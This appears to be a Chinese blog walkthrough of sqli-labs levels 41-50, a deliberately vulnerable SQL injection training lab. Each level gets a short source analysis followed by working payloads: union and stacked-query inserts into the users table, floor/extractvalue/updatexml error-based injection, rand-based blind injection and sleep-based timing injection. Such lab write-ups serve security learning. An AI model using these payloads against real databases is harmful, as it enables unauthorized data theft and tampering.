sqli-labs(41-50)

最新推荐文章于 2024-06-05 20:30:56 发布
最新推荐文章于 2024-06-05 20:30:56 发布
阅读量374 收藏 1
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LZHPIG/article/details/104077684
版权

人过留名,雁过留声
人生天地间,凡有大动静处
必有猪头

Less 41

① 源码分析

参数直接获取
参数直接拼接(数字型注入)
有数据回显
没有错误信息回显(也无伤大雅,构造的payload如果有错就没有回显而已)
mysqli_multi_query()堆叠注入

在这里插入图片描述

② 漏洞利用

可以先通过普通注入获取数据库,数据表,数据列,字段名
然后结合堆叠注入再进行进一步操作,思路和 Less39 差不多

1.普通注入

?id=0 union select 1,2,3

在这里插入图片描述

2.堆叠注入

?id=1;insert into users(id,username,password) values ('666','zhutou','zhutou');

在这里插入图片描述

Less 42

① 源码分析

username 被过滤;password 没有过滤
单引号引用参数(字符型注入)
mysqli_multi_query()堆叠注入

在这里插入图片描述

② 漏洞利用

password 没被过滤,可以在 password 处构造 payload
同样可以通过普通 sql 注入得知敏感信息,然后结合堆叠注入进行数据库操作

  1. 在 index.php 页面的表单随便提交参数,打开开发者工具(f12)查看参数提交方式。
    在这里插入图片描述

  2. 由于在 index.php 提交的参数要传到 login.php 文件进行操作,所以要在 login.php 页面进行 POST 提交参数操作。
    在这里插入图片描述

login_user=1&login_password=2';insert into users(id,username,password) values ('888','zhutou1','zhutou1'); --+

在这里插入图片描述

Less 43

源码分析

和 Less 42 差不多的思路,就是参数被单引号+括号引用,注意采取相应的方法闭合即可

在这里插入图片描述

Less 44

源码分析

和 Less 42 相比的区别就是没有 mysqli_error($con1) 错误信息回显。注入的思路和 Less 42 一致。

Less 45

源码分析

和 Less 43 相比的区别就是没有 mysqli_error($con1) 错误信息回显。注入的思路和 Less 43 一致。

Less 46

① 源码分析

order by 注入不比 union 注入,使用报错注入,rand(true/false),延时注入。
mysql_query()单语句操作
有错误信息回显

在这里插入图片描述

② 漏洞利用

sort=1 desc或者(1 asc),显示结果不同,则表明可以注入。(升序/降序)
报错注入:
floor 注入
extractvalue 注入
updatexml 注入
(PS:MySQL 5.1.5版本中添加了对XML文档进行查询和修改的两个函数:extractvalue、updatexml)

1. 升序

?sort=1 asc

在这里插入图片描述

2. 降序

?sort=1 desc

在这里插入图片描述

3. 报错注入

3.1 floor 注入
?sort=(select 1 from(select count(*),concat((database()),floor(rand(0)*2))x from information_schema.tables group by x)a)

在这里插入图片描述

3.2 extractvalue 注入
extractvalue(1,concat(0x7e,(database()),0x7e))

在这里插入图片描述

3.3 updatexml 注入
updatexml(1,concat(0x7e,(database()),0x7e),1)

在这里插入图片描述

Less 47

① 源码分析

和 Less 46 相比,参数被单引号引用(字符型注入)
有错误信息回显

在这里插入图片描述

② 漏洞利用

报错注入
注意单引号闭合和注释符使用

floor 注入

?sort=1' and (select 1 from(select count(*),concat((database()),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

在这里插入图片描述
extractvalue 注入和 updatexml 注入同理可得。

Less 48

① 源码分析

和 Less 46 相比就是没有错误信息回显

② 漏洞利用

没有错误信息回显,所以不能使用报错注入
使用 rand(true/false) 对回显信息进行判断

1. rand(true) == rand(1)

?sort=rand(1)

在这里插入图片描述

2. rand(false) == rand(0)

?sort=rand(0)

在这里插入图片描述

3. 猜测数据库

如果当前数据库名的第一个字母的 ASCII 值大于0,则表格回显的格式和 rand(1) 一致;如果小于或等于0,则表格回显的格式和 rand(0) 一致。

?sort=rand(ascii(substring(database(),0,1))>0)

在这里插入图片描述

Less 49

① 源码分析

和 Less 48 相比,就是构造 sql 语句的时候对参数进行单引号引用并拼接

② 漏洞利用

单引号闭合
使用延时注入

每遍历一个条目延时1秒

?sort=1' and if(ascii(substring(database(),0,1))>0,1,sleep(1)) %23

Less 50

① 源码分析

order by 的堆叠注入

在这里插入图片描述

② 漏洞利用

可以利用 order by 的普通注入获取数据库敏感信息,然后使用堆叠注入对敏感信息加以利用。

向 users 表插入信息

?sort=1;insert into users(id,username,password) values ('886','zhutou8','zhutou8');

在这里插入图片描述

                                                                                                                                    猪头
                                                                                                                              2020.1.24
z_hunter
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs Less-50、51、52、53(sqli-labs闯关指南 50、51、52、53)— orderby stacked injection
m0_54899775的博客
12-28 688
sqli-labs Less-50、51、52、53(sqli-labs闯关指南 50、51、52、53)— orderby stacked injection
SQL-Labs靶场“46-50”关通关教程
热门推荐
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46关到50关教程,详细内容包含了:四十六关 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七关 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八关 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九关 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十关 ORDER BY数字型堆叠注等
sqlilabs靶场为例,讲解SQL注入攻击原理【42-53关】
最新发布
weixin_42515203的博客
06-05 621
sqlilabs靶场为例,讲解SQL注入攻击原理【42-53关】
SQLi-Labs 学习笔记(Less 41-50
Onlyme的博客
03-11 1238
点击打开链接Less-41 基于错误的POST型单引号字符型注入①先打开网页查看 Welcome Dhakkan与之前讲的Less-40的区别:[plain] view plain copy$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  当然,和Less-40一样,都是盲注,不会显示错误信息,不过对我们没差,构建payload:[plain]...
sqli-labs 41——65关攻略
weixin_45880717的博客
02-08 927
Less-41 基于错误的POST型单引号字符型注入 与之前讲的Less-40的区别: sql="SELECT∗FROMusersWHEREid=sql="SELECT * FROM users WHERE id=sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1"; 当然,和Less-40一样,都是盲注,不会显示错误信息,不过对我们没差,...
sqli-labs 41---64
hecker_chicken的博客
02-16 415
Sqli-labs Less-41 本关没有回显位置 采用盲注 ?id=1 and left(version(),1)=5%23(注入成功 显示) 联合注入?id=0 union select 1,database(),version()–+ (无闭合) 我在sql注入天书看到另外一种方法 index.php?id=1; insert into users(id,username,passw...
sqli-labs (less-40)
kukudeshuo的博客
03-14 362
sqli-labs (less-40) 进入40关,输入id=1 http://127.0.0.1/sql1/Less-40/?id=1' #无错误回显 因为没有错误回显,所以我们一个一个去猜闭合的方式 http://127.0.0.1/sql1/Less-40/?id=1'--+ #回显错误 http://127.0.0.1/sql1/Less-40/?id=1')--+ #回显正常 这里我们不使用union注入,我们使用堆叠注入攻击 创建一张表 http://127.0.0.1/sql1/Le
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
SQLI-LAB  的 实战记录(Less 41 - Less 53)
这块盾牌有待改良
07-20 2708
Less - 41 stacked Query Intiger type blind Less - 42 Stacked Query error based Less - 43 stacked Query String type
sqli-labs(50-53)
qq_43579362的博客
03-01 757
Less-50 从源码可以看出,这里执行sql语句的函数是mysqli_multi_query(),它与以往执行sql语句的函数mysqli_query()不同,它一次可执行多条语句,而以往的一次只能执行一条,所以可以使用堆叠注入,之前都做过很多堆叠注入了,所以不再演示,只是这里为字符型注入,下面把一些基础常用的sql语句进行了罗列 数据库 # 查看所有数据库 SHOW DATABASES; #创...
sqli-Labs————less-41
Fly_鹏程万里
05-20 491
Less-41查看源代码:<?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tr...
sqli-labs(46-49)
qq_43579362的博客
03-01 966
Less-46 这三关是排序注入order by,不同于where后面的注入,它不可以使用union联合查询注入,所以导致前面很多方法不可用,那应该如何注入,来看mysql官方给的select使用文档 可见order by后面可以使用limit,into outfile等语句,还可以跟数字等。 <1>报错注入 正常语句查询 http://127.0.0.1/sqli-labs/Less...
sqil-labs-Less1-22
qq_51558360的博客
01-03 769
声明 学习SQL注入,提高网路安全能力,漏洞发现的实质就是发现SQL语句的闭合方式,一般来讲都围绕着这几个符号 双引号 " 单引号 ’ 双引号括号 “) 单引号括号’) 实际运用过程如下 也可以结合sleep函数使用 http://192.168.239.138:86/Less-9/?id=” --+ http://192.168.239.138:86/Less-9/?id=’ --+ http://192.168.239.138:86/Less-9/?id=") --+ http://192.168.23
sqli-labs (less-42)
kukudeshuo的博客
03-14 1059
sqli-labs (less-42) 进入42关,我们发现与less-24的页面好像一模一样 那这里我们是否能跟less-24一样使用二次注入攻击呢,经过我的各种尝试发现这关使用二次注入是行不通的,这关我们应该使用堆叠注入攻击 利用F12开发者工具将password的位置改为text,用明文查看 创建一张表试试 a';create table test like users;# 再试试创建一个新用户 a';insert into users values(18,'icepeak','icepea
实现前41-50条数据
风过无声
12-21 1084
select * from tablename where (id not in (select top 40 id from tablename order by id)) and id in (select top 50 id from tablename order by id) 这样就能实现前41-50条数据
sqli-labs50怎么做
05-23
Sqli-labs是一个非常流行的Web安全漏洞实验室,其中包含了大量的SQL注入漏洞实验。如果您想学习SQL注入攻击和防御,这是一个非常不错的实践平台。 关于如何完成sqli-labs50实验,您可以按照以下步骤进行: 1. 首先,您需要下载并安装sqli-labs。 2. 打开实验室后,在左侧选择“Lessons”选项卡。 3. 在下拉列表中选择“Error Based SQL Injection - Integer/Data Type”。 4. 点击“Next”按钮,进入下一步。 5. 按照提示,在输入框中输入数字,然后点击“Submit”按钮。 6. 在返回的页面中,您可以看到错误信息,这里我们可以尝试使用SQL注入攻击来获取数据库中的数据。 7. 通过修改输入框中的数字,我们可以看到不同的错误信息。这些错误信息是我们进行SQL注入攻击时所需要利用的信息。 8. 最终,您需要通过SQL注入攻击来获取数据库中的数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值